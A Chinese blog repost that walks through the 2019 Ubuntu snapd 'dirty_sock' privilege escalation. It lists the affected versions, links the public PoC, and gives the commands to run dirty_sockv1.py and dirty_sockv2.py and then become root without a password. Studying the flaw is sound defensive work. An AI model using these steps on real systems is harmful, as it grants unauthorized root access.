标签：LTS 7304 漏洞 提权 2019 dirty Ubuntu sch01ar com

漏洞描述：

Ubuntu 版本：

Ubuntu 18.10

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 LTS

2.28 < snapd < 2.37 会存在该漏洞

Poc Github：https://github.com/initstring/dirty_sock

 

#1

注册并登陆，https://login.ubuntu.com/ 在 Ubuntu 上，生成密钥

ssh-keygen -t rsa -C "your_email@example.com"

查看公钥

将公钥复制到网站上

接下来执行 poc

python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"

执行完之后 sch01ar 被修改为 Ubuntu 上的用户名

接着切换为 root 用户

sudo -i

 

切换成 root 用户时不需要输入密码

 

#2

直接运行脚本

python3 dirty_sockv2.py

执行完会生成一个 dirty_sock 的用户，密码也是这个

标签：LTS,7304,漏洞,提权,2019,dirty,Ubuntu,sch01ar,com
来源： https://www.cnblogs.com/sch01ar/p/10453368.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。